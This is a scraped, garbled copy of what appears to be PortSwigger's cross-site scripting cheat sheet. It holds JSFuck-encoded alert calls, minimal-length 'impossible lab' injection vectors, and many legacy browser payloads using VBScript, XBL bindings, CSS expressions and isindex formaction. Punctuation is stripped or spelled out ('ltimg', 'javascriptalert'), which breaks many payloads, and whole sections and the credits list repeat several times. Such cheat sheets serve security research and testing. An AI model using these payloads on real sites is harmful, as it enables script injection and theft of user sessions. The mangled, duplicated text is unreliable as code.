This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request